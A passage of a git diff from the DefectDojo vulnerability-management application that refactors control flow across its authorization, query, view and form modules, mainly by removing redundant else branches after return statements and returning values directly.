extra_fields=()): - combined = default_fields + extra_fields - return combined + return default_fields + extra_fields def get_model_default_fields(model): diff --git a/dojo/authorization/authorization.py b/dojo/authorization/authorization.py index a542d7c6e01..8f013b60061 100644 --- a/dojo/authorization/authorization.py +++ b/dojo/authorization/authorization.py @@ -66,7 +66,7 @@ def user_has_permission(user, obj, permission): if role_has_permission(product_type_group.role.id, permission): return True return False - elif ( + if ( isinstance(obj, Product) and permission.value >= Permissions.Product_View.value ): @@ -87,51 +87,51 @@ def user_has_permission(user, obj, permission): if role_has_permission(product_group.role.id, permission): return True return False - elif ( + if ( isinstance(obj, Engagement) and permission in Permissions.get_engagement_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Test) and permission in Permissions.get_test_permissions() ): return user_has_permission(user, obj.engagement.product, permission) - elif ( + if ( isinstance(obj, Finding) or isinstance(obj, Stub_Finding) ) and permission in Permissions.get_finding_permissions(): return user_has_permission( user, obj.test.engagement.product, permission, ) - elif ( + if ( isinstance(obj, Finding_Group) and permission in Permissions.get_finding_group_permissions() ): return user_has_permission( user, obj.test.engagement.product, permission, ) - elif ( + if ( isinstance(obj, Endpoint) and permission 
in Permissions.get_endpoint_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Languages) and permission in Permissions.get_language_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, App_Analysis) and permission in Permissions.get_technology_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Product_API_Scan_Configuration) and permission in Permissions.get_product_api_scan_configuration_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Product_Type_Member) and permission in Permissions.get_product_type_member_permissions() ): @@ -140,9 +140,8 @@ def user_has_permission(user, obj, permission): return obj.user == user or user_has_permission( user, obj.product_type, permission, ) - else: - return user_has_permission(user, obj.product_type, permission) - elif ( + return user_has_permission(user, obj.product_type, permission) + if ( isinstance(obj, Product_Member) and permission in Permissions.get_product_member_permissions() ): @@ -151,19 +150,18 @@ def user_has_permission(user, obj, permission): return obj.user == user or user_has_permission( user, obj.product, permission, ) - else: - return user_has_permission(user, obj.product, permission) - elif ( + return user_has_permission(user, obj.product, permission) + if ( isinstance(obj, Product_Type_Group) and permission in Permissions.get_product_type_group_permissions() ): return user_has_permission(user, obj.product_type, permission) - elif ( + if ( isinstance(obj, Product_Group) and permission in Permissions.get_product_group_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Dojo_Group) and permission in Permissions.get_group_permissions() ): @@ -173,7 +171,7 @@ def user_has_permission(user, obj, permission): return group_member is not None and role_has_permission( group_member.role.id, permission, ) - elif ( + if ( isinstance(obj, Dojo_Group_Member) and permission in Permissions.get_group_member_permissions() ): @@ -182,9 +180,8 @@ def user_has_permission(user, obj, permission): return obj.user == user or user_has_permission( user, obj.group, permission, ) - else: - return user_has_permission(user, obj.group, permission) - elif ( + return user_has_permission(user, obj.group, permission) + if ( isinstance(obj, Cred_Mapping) and permission in Permissions.get_credential_permissions() ): @@ -202,9 +199,9 @@ def user_has_permission(user, obj, permission): return user_has_permission( user, obj.finding.test.engagement.product, permission, ) - else: - msg = f"No authorization implemented for class {type(obj).__name__} and permission {permission}" - raise NoAuthorizationImplementedError(msg) + return None + msg = f"No authorization implemented for class {type(obj).__name__} and permission {permission}" + raise NoAuthorizationImplementedError(msg) def user_has_global_permission(user, permission): diff --git a/dojo/cred/queries.py b/dojo/cred/queries.py index 4dd14385a06..28419772328 100644 --- a/dojo/cred/queries.py +++ b/dojo/cred/queries.py @@ -44,8 +44,6 @@ def get_authorized_cred_mappings(permission, queryset=None): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)) - cred_mappings = cred_mappings.filter( + return cred_mappings.filter( 
Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return cred_mappings diff --git a/dojo/cred/views.py b/dojo/cred/views.py index 31f923748b3..2fc373c3ac9 100644 --- a/dojo/cred/views.py +++ b/dojo/cred/views.py @@ -641,10 +641,8 @@ def delete_cred_controller(request, destination_url, id, ttid): if destination_url == "cred": return HttpResponseRedirect(reverse(destination_url)) - else: - return HttpResponseRedirect(reverse(destination_url, args=(id, ))) - else: - tform = CredMappingForm(instance=cred) + return HttpResponseRedirect(reverse(destination_url, args=(id, ))) + tform = CredMappingForm(instance=cred) add_breadcrumb(title="Delete Credential", top_level=False, request=request) product_tab = None diff --git a/dojo/decorators.py b/dojo/decorators.py index 129106c74de..b6902b8dc10 100644 --- a/dojo/decorators.py +++ b/dojo/decorators.py @@ -43,8 +43,7 @@ def __wrapper__(*args, **kwargs): countdown = kwargs.pop("countdown", 0) if we_want_async(*args, func=func, **kwargs): return func.apply_async(args=args, kwargs=kwargs, countdown=countdown) - else: - return func(*args, **kwargs) + return func(*args, **kwargs) return __wrapper__ @@ -78,8 +77,7 @@ def __wrapper__(*args, **kwargs): if _func is None: # decorator called without parameters return dojo_model_to_id_internal - else: - return dojo_model_to_id_internal(_func) + return dojo_model_to_id_internal(_func) # decorator with parameters needs another wrapper layer @@ -123,8 +121,7 @@ def __wrapper__(*args, **kwargs): if _func is None: # decorator called without parameters return dojo_model_from_id_internal - else: - return dojo_model_from_id_internal(_func) + return dojo_model_from_id_internal(_func) def get_parameter_froms_args_kwargs(args, kwargs, parameter): diff --git a/dojo/endpoint/queries.py b/dojo/endpoint/queries.py index 581feefc13b..684eeab7b1a 100644 --- a/dojo/endpoint/queries.py +++ b/dojo/endpoint/queries.py @@ -53,12 +53,10 @@ def get_authorized_endpoints(permission, queryset=None, user=None): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)) - endpoints = endpoints.filter( + return endpoints.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return endpoints - def get_authorized_endpoint_status(permission, queryset=None, user=None): @@ -101,8 +99,6 @@ def get_authorized_endpoint_status(permission, queryset=None, user=None): endpoint__product__member=Exists(authorized_product_roles), endpoint__product__prod_type__authorized_group=Exists(authorized_product_type_groups), endpoint__product__authorized_group=Exists(authorized_product_groups)) - endpoint_status = endpoint_status.filter( + return endpoint_status.filter( Q(endpoint__product__prod_type__member=True) | Q(endpoint__product__member=True) | Q(endpoint__product__prod_type__authorized_group=True) | Q(endpoint__product__authorized_group=True)) - - return endpoint_status diff --git a/dojo/endpoint/utils.py b/dojo/endpoint/utils.py index be1c63fb0c0..d5c378e5e97 100644 --- a/dojo/endpoint/utils.py +++ b/dojo/endpoint/utils.py @@ -79,17 +79,16 @@ def endpoint_get_or_create(**kwargs): count = qs.count() if count == 0: return Endpoint.objects.get_or_create(**kwargs) - elif count == 1: - return qs.order_by("id").first(), False - else: - 
logger.warning( - f"Endpoints in your database are broken. " - f"Please access {reverse('endpoint_migrate')} and migrate them to new format or remove them.", - ) - # Get the oldest endpoint first, and return that instead - # a datetime is not captured on the endpoint model, so ID - # will have to work here instead + if count == 1: return qs.order_by("id").first(), False + logger.warning( + f"Endpoints in your database are broken. " + f"Please access {reverse('endpoint_migrate')} and migrate them to new format or remove them.", + ) + # Get the oldest endpoint first, and return that instead + # a datetime is not captured on the endpoint model, so ID + # will have to work here instead + return qs.order_by("id").first(), False def clean_hosts_run(apps, change): @@ -325,7 +324,7 @@ def endpoint_meta_import(file, product, create_endpoints, create_tags, create_me 'The column "hostname" must be present to map host to Endpoint.', extra_tags="alert-danger") return HttpResponseRedirect(reverse("import_endpoint_meta", args=(product.id, ))) - elif origin == "API": + if origin == "API": msg = 'The column "hostname" must be present to map host to Endpoint.' raise ValidationError(msg) @@ -361,14 +360,14 @@ def endpoint_meta_import(file, product, create_endpoints, create_tags, create_me for tag in existing_tags: if item[0] not in tag: continue - else: - # found existing. Update it - existing_tags.remove(tag) - break + # found existing. Update it + existing_tags.remove(tag) + break existing_tags += [item[0] + ":" + item[1]] # if tags are not supposed to be added, this value remain unchanged endpoint.tags = existing_tags endpoint.save() + return None def remove_broken_endpoint_statuses(apps): diff --git a/dojo/endpoint/views.py b/dojo/endpoint/views.py index 571f4989ec2..06ee7ac24a1 100644 --- a/dojo/endpoint/views.py +++ b/dojo/endpoint/views.py @@ -98,9 +98,8 @@ def get_endpoint_ids(endpoints): key = f"{e.host}-{e.product.id}" if key in hosts: continue - else: - hosts.append(key) - ids.append(e.id) + hosts.append(key) + ids.append(e.id) return ids @@ -307,8 +306,7 @@ def add_meta_data(request, eid): extra_tags="alert-success") if "add_another" in request.POST: return HttpResponseRedirect(reverse("add_endpoint_meta_data", args=(eid,))) - else: - return HttpResponseRedirect(reverse("view_endpoint", args=(eid,))) + return HttpResponseRedirect(reverse("view_endpoint", args=(eid,))) else: form = DojoMetaDataForm() diff --git a/dojo/engagement/queries.py b/dojo/engagement/queries.py index 9d8e9b6ae41..97eeb31bdfa 100644 --- a/dojo/engagement/queries.py +++ b/dojo/engagement/queries.py @@ -39,8 +39,6 @@ def get_authorized_engagements(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - engagements = engagements.filter( + return engagements.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return engagements diff --git a/dojo/engagement/views.py b/dojo/engagement/views.py index 777a5f7a118..d9d3cef0340 100644 --- a/dojo/engagement/views.py +++ b/dojo/engagement/views.py @@ -166,15 +166,13 @@ def get_filtered_engagements(request, view): filter_string_matching = get_system_setting("filter_string_matching", False) filter_class = EngagementDirectFilterWithoutObjectLookups if filter_string_matching else EngagementDirectFilter - engagements = 
filter_class(request.GET, queryset=engagements) - - return engagements + return filter_class(request.GET, queryset=engagements) def get_test_counts(engagements): # Get the test counts per engagement. As a separate query, this is much # faster than annotating the above `engagements` query. - engagement_test_counts = { + return { test["engagement"]: test["test_count"] for test in Test.objects.filter( engagement__in=engagements, @@ -184,7 +182,6 @@ def get_test_counts(engagements): test_count=Count("engagement"), ) } - return engagement_test_counts def engagements(request, view): @@ -304,9 +301,8 @@ def edit_engagement(request, eid): if "_Add Tests" in request.POST: return HttpResponseRedirect( reverse("add_tests", args=(engagement.id, ))) - else: - return HttpResponseRedirect( - reverse("view_engagement", args=(engagement.id, ))) + return HttpResponseRedirect( + reverse("view_engagement", args=(engagement.id, ))) else: logger.debug(form.errors) @@ -404,12 +400,11 @@ def copy_engagement(request, eid): recipients=[engagement.lead], icon="exclamation-triangle") return redirect_to_return_url_or_else(request, reverse("view_engagements", args=(product.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to copy engagement, please try again.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to copy engagement, please try again.", + extra_tags="alert-danger") product_tab = Product_Tab(product, title="Copy Engagement", tab="engagements") return render(request, "dojo/copy_object.html", { @@ -427,8 +422,7 @@ def get_template(self): return "dojo/view_eng.html" def get_risks_accepted(self, eng): - risks_accepted = eng.risk_acceptance.all().select_related("owner").annotate(accepted_findings_count=Count("accepted_findings__id")) - return risks_accepted + return eng.risk_acceptance.all().select_related("owner").annotate(accepted_findings_count=Count("accepted_findings__id")) def get_filtered_tests( self, @@ -673,10 +667,10 @@ def add_tests(request, eid): if "_Add Another Test" in request.POST: return HttpResponseRedirect( reverse("add_tests", args=(eng.id, ))) - elif "_Add Findings" in request.POST: + if "_Add Findings" in request.POST: return HttpResponseRedirect( reverse("add_findings", args=(new_test.id, ))) - elif "_Finished" in request.POST: + if "_Finished" in request.POST: return HttpResponseRedirect( reverse("view_engagement", args=(eng.id, ))) else: @@ -751,8 +745,7 @@ def get_form( """ if request.method == "POST": return ImportScanForm(request.POST, request.FILES, **kwargs) - else: - return ImportScanForm(**kwargs) + return ImportScanForm(**kwargs) def get_credential_form( self, @@ -766,18 +759,17 @@ def get_credential_form( """ if request.method == "POST": return CredMappingForm(request.POST) - else: - # If the engagement is not present, return an empty form - if engagement is None: - return CredMappingForm() - # Otherwise get all creds in the associated engagement - return CredMappingForm( - initial={ - "cred_user_queryset": Cred_Mapping.objects.filter( - engagement=engagement, - ).order_by("cred_id"), - }, - ) + # If the engagement is not present, return an empty form + if engagement is None: + return CredMappingForm() + # Otherwise get all creds in the associated engagement + return CredMappingForm( + initial={ + "cred_user_queryset": Cred_Mapping.objects.filter( + engagement=engagement, + ).order_by("cred_id"), + }, + ) def get_jira_form( self, @@ -1401,8 +1393,7 @@ def view_edit_risk_acceptance(request, eid, raid, 
edit_mode=False): if not errors: logger.debug("redirecting to return_url") return redirect_to_return_url_or_else(request, reverse("view_risk_acceptance", args=(eid, raid))) - else: - logger.error("errors found") + logger.error("errors found") else: if edit_mode: @@ -1549,8 +1540,7 @@ def upload_threatmodel(request, eid): @user_is_authorized(Engagement, Permissions.Engagement_View, "eid") def view_threatmodel(request, eid): eng = get_object_or_404(Engagement, pk=eid) - response = FileResponse(open(eng.tmodel_path, "rb")) - return response + return FileResponse(open(eng.tmodel_path, "rb")) @user_is_authorized(Engagement, Permissions.Engagement_View, "eid") @@ -1589,9 +1579,8 @@ def get_engagements(request): if not url: msg = "Please use the export button when exporting engagements" raise ValidationError(msg) - else: - if url.startswith("url="): - url = url[4:] + if url.startswith("url="): + url = url[4:] path_items = list(filter(None, re.split(r"/|\?", url))) diff --git a/dojo/filters.py b/dojo/filters.py index 1461966c19e..35ceb205938 100644 --- a/dojo/filters.py +++ b/dojo/filters.py @@ -331,8 +331,7 @@ def get_tags_model_from_field_name(field): def get_tags_label_from_model(model): if model: return f"Tags ({model.__name__.title()})" - else: - return "Tags (Unknown)" + return "Tags (Unknown)" def get_finding_filterset_fields(metrics=False, similar=False, filter_string_matching=False): @@ -780,6 +779,7 @@ def any(self, qs, name): self.start_date = _truncate(start_date - timedelta(days=1)) self.end_date = _truncate(now() + timedelta(days=1)) return qs.all() + return None def current_month(self, qs, name): self.start_date = local_tz.localize( @@ -1927,8 +1927,7 @@ def set_hash_codes(self, *args: list, **kwargs: dict): def filter_queryset(self, *args: list, **kwargs: dict): queryset = super().filter_queryset(*args, **kwargs) queryset = get_authorized_findings(Permissions.Finding_View, queryset, self.user) - queryset = queryset.exclude(pk=self.finding.pk) - return queryset + return queryset.exclude(pk=self.finding.pk) class SimilarFindingFilter(FindingFilter, SimilarFindingHelper): diff --git a/dojo/finding/queries.py b/dojo/finding/queries.py index 7f213805a49..47386e43f86 100644 --- a/dojo/finding/queries.py +++ b/dojo/finding/queries.py @@ -68,14 +68,12 @@ def get_authorized_findings(permission, queryset=None, user=None): test__engagement__product__member=Exists(authorized_product_roles), test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), test__engagement__product__authorized_group=Exists(authorized_product_groups)) - findings = findings.filter( + return findings.filter( Q(test__engagement__product__prod_type__member=True) | Q(test__engagement__product__member=True) | Q(test__engagement__product__prod_type__authorized_group=True) | Q(test__engagement__product__authorized_group=True)) - return findings - def get_authorized_stub_findings(permission): user = get_current_user() @@ -101,14 +99,12 @@ def get_authorized_stub_findings(permission): test__engagement__product__member=Exists(authorized_product_roles), test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), test__engagement__product__authorized_group=Exists(authorized_product_groups)).order_by("id") - findings = findings.filter( + return findings.filter( Q(test__engagement__product__prod_type__member=True) | Q(test__engagement__product__member=True) | Q(test__engagement__product__prod_type__authorized_group=True) | 
Q(test__engagement__product__authorized_group=True)) - return findings - def get_authorized_vulnerability_ids(permission, queryset=None, user=None): @@ -151,10 +147,8 @@ def get_authorized_vulnerability_ids(permission, queryset=None, user=None): finding__test__engagement__product__member=Exists(authorized_product_roles), finding__test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), finding__test__engagement__product__authorized_group=Exists(authorized_product_groups)) - vulnerability_ids = vulnerability_ids.filter( + return vulnerability_ids.filter( Q(finding__test__engagement__product__prod_type__member=True) | Q(finding__test__engagement__product__member=True) | Q(finding__test__engagement__product__prod_type__authorized_group=True) | Q(finding__test__engagement__product__authorized_group=True)) - - return vulnerability_ids diff --git a/dojo/finding/views.py b/dojo/finding/views.py index 4b37ebc8a9a..8d453ab5fed 100644 --- a/dojo/finding/views.py +++ b/dojo/finding/views.py @@ -311,31 +311,29 @@ def get_test_id(self): def filter_findings_by_object(self, findings: QuerySet[Finding]): if product_id := self.get_product_id(): return findings.filter(test__engagement__product__id=product_id) - elif engagement_id := self.get_engagement_id(): + if engagement_id := self.get_engagement_id(): return findings.filter(test__engagement=engagement_id) - elif test_id := self.get_test_id(): + if test_id := self.get_test_id(): return findings.filter(test=test_id) - else: - return findings + return findings def filter_findings_by_filter_name(self, findings: QuerySet[Finding]): filter_name = self.get_filter_name() if filter_name == "Open": return findings.filter(finding_helper.OPEN_FINDINGS_QUERY) - elif filter_name == "Verified": + if filter_name == "Verified": return findings.filter(finding_helper.VERIFIED_FINDINGS_QUERY) - elif filter_name == "Out of Scope": + if filter_name == "Out of Scope": return findings.filter(finding_helper.OUT_OF_SCOPE_FINDINGS_QUERY) - elif filter_name == "False Positive": + if filter_name == "False Positive": return findings.filter(finding_helper.FALSE_POSITIVE_FINDINGS_QUERY) - elif filter_name == "Inactive": + if filter_name == "Inactive": return findings.filter(finding_helper.INACTIVE_FINDINGS_QUERY) - elif filter_name == "Accepted": + if filter_name == "Accepted": return findings.filter(finding_helper.ACCEPTED_FINDINGS_QUERY) - elif filter_name == "Closed": + if filter_name == "Closed": return findings.filter(finding_helper.CLOSED_FINDINGS_QUERY) - else: - return findings + return findings def filter_findings_by_form(self, request: HttpRequest, findings: QuerySet[Finding]): # Set up the args for the form @@ -358,9 +356,7 @@ def filter_findings_by_form(self, request: HttpRequest, findings: QuerySet[Findi def get_filtered_findings(self): findings = get_authorized_findings(Permissions.Finding_View).order_by(self.get_order_by()) findings = self.filter_findings_by_object(findings) - findings = self.filter_findings_by_filter_name(findings) - - return findings + return self.filter_findings_by_filter_name(findings) def get_fully_filtered_findings(self, request: HttpRequest): findings = self.get_filtered_findings() @@ -1017,9 +1013,8 @@ def process_finding_form(self, request: HttpRequest, finding: Finding, context: ) return finding, request, True - else: - add_error_message_to_response("The form has errors, please correct them below.") - add_field_errors_to_response(context["form"]) + add_error_message_to_response("The form has errors, please 
correct them below.") + add_field_errors_to_response(context["form"]) return finding, request, False @@ -1074,8 +1069,7 @@ def process_jira_form(self, request: HttpRequest, finding: Finding, context: dic ) return request, True, push_to_jira - else: - add_field_errors_to_response(context["jform"]) + add_field_errors_to_response(context["jform"]) return request, False, False @@ -1090,8 +1084,7 @@ def process_github_form(self, request: HttpRequest, finding: Finding, context: d add_external_issue(finding, "github") return request, True - else: - add_field_errors_to_response(context["gform"]) + add_field_errors_to_response(context["gform"]) return request, False @@ -1316,10 +1309,9 @@ def close_finding(request, fid): return HttpResponseRedirect( reverse("view_test", args=(finding.test.id,)), ) - else: - return HttpResponseRedirect( - reverse("close_finding", args=(finding.id,)), - ) + return HttpResponseRedirect( + reverse("close_finding", args=(finding.id,)), + ) product_tab = Product_Tab( finding.test.engagement.product, title="Close", tab="findings", @@ -1502,15 +1494,14 @@ def apply_template_cwe(request, fid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("view_finding", args=(fid,))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to apply CWE template finding, please try again.", - extra_tags="alert-danger", - ) - else: - raise PermissionDenied + messages.add_message( + request, + messages.ERROR, + "Unable to apply CWE template finding, please try again.", + extra_tags="alert-danger", + ) + return None + raise PermissionDenied @user_is_authorized(Finding, Permissions.Finding_Edit, "fid") @@ -1549,13 +1540,12 @@ def copy_finding(request, fid): return redirect_to_return_url_or_else( request, reverse("view_test", args=(test.id,)), ) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to copy finding, please try again.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Unable to copy finding, please try again.", + extra_tags="alert-danger", + ) product_tab = Product_Tab(product, title="Copy Finding", tab="findings") return render( @@ -2002,8 +1992,7 @@ def apply_template_to_finding(request, fid, tid): ) return HttpResponseRedirect(reverse("view_finding", args=(finding.id,))) - else: - return HttpResponseRedirect(reverse("view_finding", args=(finding.id,))) + return HttpResponseRedirect(reverse("view_finding", args=(finding.id,))) @user_is_authorized(Test, Permissions.Finding_Add, "tid") @@ -2063,15 +2052,14 @@ def delete_stub_finding(request, fid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("view_test", args=(tid,))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete potential finding, please try again.", - extra_tags="alert-danger", - ) - else: - raise PermissionDenied + messages.add_message( + request, + messages.ERROR, + "Unable to delete potential finding, please try again.", + extra_tags="alert-danger", + ) + return None + raise PermissionDenied @user_is_authorized(Stub_Finding, Permissions.Finding_Edit, "fid") @@ -2188,13 +2176,12 @@ def promote_to_finding(request, fid): ) return HttpResponseRedirect(reverse("view_test", args=(test.id,))) - else: - form_error = True - add_error_message_to_response( - "The form has errors, please correct them below.", - ) - add_field_errors_to_response(jform) - add_field_errors_to_response(form) + form_error = True + add_error_message_to_response( + "The form has errors, please correct them below.", + 
) + add_field_errors_to_response(jform) + add_field_errors_to_response(form) else: form = PromoteFindingForm( initial={ @@ -2356,13 +2343,12 @@ def add_template(request): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("templates")) - else: - messages.add_message( - request, - messages.ERROR, - "Template form has error, please revise and try again.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Template form has error, please revise and try again.", + extra_tags="alert-danger", + ) add_breadcrumb(title="Add Template", top_level=False, request=request) return render( request, "dojo/add_template.html", {"form": form, "name": "Add Template"}, @@ -2411,13 +2397,12 @@ def edit_template(request, tid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("templates")) - else: - messages.add_message( - request, - messages.ERROR, - "Template form has error, please revise and try again.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Template form has error, please revise and try again.", + extra_tags="alert-danger", + ) count = apply_cwe_mitigation(apply_to_findings=True, template=template, update=False) add_breadcrumb(title="Edit Template", top_level=False, request=request) @@ -2447,15 +2432,14 @@ def delete_template(request, tid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("templates")) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete Template, please revise and try again.", - extra_tags="alert-danger", - ) - else: - raise PermissionDenied + messages.add_message( + request, + messages.ERROR, + "Unable to delete Template, please revise and try again.", + extra_tags="alert-danger", + ) + return None + raise PermissionDenied def download_finding_pic(request, token): @@ -2661,13 +2645,12 @@ def merge_finding_product(request, pid): return HttpResponseRedirect( reverse("edit_finding", args=(finding_to_merge_into.id,)), ) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to merge findings. Findings to merge contained in finding to merge into.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Unable to merge findings. 
Findings to merge contained in finding to merge into.", + extra_tags="alert-danger", + ) else: messages.add_message( request, @@ -3137,8 +3120,7 @@ def find_available_notetypes(notes): break else: available_note_types.append(note_type_id) - queryset = Note_Type.objects.filter(id__in=available_note_types).order_by("-id") - return queryset + return Note_Type.objects.filter(id__in=available_note_types).order_by("-id") def get_missing_mandatory_notetypes(finding): @@ -3153,8 +3135,7 @@ def get_missing_mandatory_notetypes(finding): break else: notes_to_be_added.append(note_type_id) - queryset = Note_Type.objects.filter(id__in=notes_to_be_added) - return queryset + return Note_Type.objects.filter(id__in=notes_to_be_added) @user_is_authorized(Finding, Permissions.Finding_Edit, "original_id") diff --git a/dojo/finding_group/queries.py b/dojo/finding_group/queries.py index aae57f53c83..39b91c02665 100644 --- a/dojo/finding_group/queries.py +++ b/dojo/finding_group/queries.py @@ -46,10 +46,8 @@ def get_authorized_finding_groups(permission, queryset=None, user=None): test__engagement__product__member=Exists(authorized_product_roles), test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), test__engagement__product__authorized_group=Exists(authorized_product_groups)) - finding_groups = finding_groups.filter( + return finding_groups.filter( Q(test__engagement__product__prod_type__member=True) | Q(test__engagement__product__member=True) | Q(test__engagement__product__prod_type__authorized_group=True) | Q(test__engagement__product__authorized_group=True)) - - return finding_groups diff --git a/dojo/forms.py b/dojo/forms.py index acf3546285b..cdff2b53d52 100644 --- a/dojo/forms.py +++ b/dojo/forms.py @@ -597,8 +597,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -611,8 +610,7 @@ def clean_scan_date(self): return date def get_scan_type(self): - TGT_scan = self.cleaned_data["scan_type"] - return TGT_scan + return self.cleaned_data["scan_type"] class ReImportScanForm(forms.Form): @@ -1146,8 +1144,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1224,8 +1221,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1282,8 +1278,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1406,8 +1401,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1677,8 +1671,7 @@ 
def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(endpoint) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_process = endpoints_to_add_list + self.endpoints_to_process = endpoints_to_add_list return cleaned_data @@ -2683,9 +2676,7 @@ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def clean(self): - form_data = self.cleaned_data - - return form_data + return self.cleaned_data class CredMappingForm(forms.ModelForm): @@ -2972,9 +2963,9 @@ def clean(self): if self.target == "engagement": msg = "JIRA Project needs a JIRA Instance, JIRA Project Key, and Epic issue type name, or choose to inherit settings from product" raise ValidationError(msg) - else: - msg = "JIRA Project needs a JIRA Instance, JIRA Project Key, and Epic issue type name, leave empty to have no JIRA integration setup" - raise ValidationError(msg) + msg = "JIRA Project needs a JIRA Instance, JIRA Project Key, and Epic issue type name, leave empty to have no JIRA integration setup" + raise ValidationError(msg) + return None class GITHUBFindingForm(forms.Form): @@ -3158,8 +3149,7 @@ class LoginBanner(forms.Form): ) def clean(self): - cleaned_data = super().clean() - return cleaned_data + return super().clean() class AnnouncementCreateForm(forms.ModelForm): @@ -3393,7 +3383,7 @@ def clean_expiration(self): if expiration < today: msg = "The expiration cannot be in the past" raise forms.ValidationError(msg) - elif expiration.day == today.day: + if expiration.day == today.day: msg = "The expiration cannot be today" raise forms.ValidationError(msg) else: @@ -3483,8 +3473,7 @@ def __init__(self, attrs=None): def decompress(self, value): if value: return pickle.loads(value) - else: - return [None, None, None, None, None, None] + return [None, None, None, None, None, None] def format_output(self, rendered_widgets): return "
    ".join(rendered_widgets) diff --git a/dojo/github_issue_link/views.py b/dojo/github_issue_link/views.py index f7bb90a37f2..e0ddabd1deb 100644 --- a/dojo/github_issue_link/views.py +++ b/dojo/github_issue_link/views.py @@ -52,11 +52,11 @@ def new_github(request): "Unable to authenticate on GitHub.", extra_tags="alert-danger") return HttpResponseRedirect(reverse("github")) - else: - gform = GITHUBForm() - add_breadcrumb(title="New GitHub Configuration", top_level=False, request=request) - return render(request, "dojo/new_github.html", - {"gform": gform}) + return None + gform = GITHUBForm() + add_breadcrumb(title="New GitHub Configuration", top_level=False, request=request) + return render(request, "dojo/new_github.html", + {"gform": gform}) @user_is_configuration_authorized("dojo.view_github_conf") diff --git a/dojo/group/queries.py b/dojo/group/queries.py index a8b70e6b761..dedb0d35e14 100644 --- a/dojo/group/queries.py +++ b/dojo/group/queries.py @@ -38,8 +38,7 @@ def get_authorized_group_members(permission): def get_authorized_group_members_for_user(user): groups = get_authorized_groups(Permissions.Group_View) - group_members = Dojo_Group_Member.objects.filter(user=user, group__in=groups).order_by("group__name").select_related("role", "group") - return group_members + return Dojo_Group_Member.objects.filter(user=user, group__in=groups).order_by("group__name").select_related("role", "group") def get_group_members_for_group(group): diff --git a/dojo/group/views.py b/dojo/group/views.py index 4f7dea473b5..fa2fd1e65b1 100644 --- a/dojo/group/views.py +++ b/dojo/group/views.py @@ -185,12 +185,11 @@ def process_forms(self, request: HttpRequest, group: Dojo_Group, context: dict): extra_tags="alert-success") return request, True - else: - messages.add_message( - request, - messages.ERROR, - "Group was not saved successfully.", - extra_tags="alert_danger") + messages.add_message( + request, + messages.ERROR, + "Group was not saved successfully.", + extra_tags="alert_danger") return request, False @@ -450,8 +449,7 @@ def edit_group_member(request, mid): extra_tags="alert-warning") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_group", 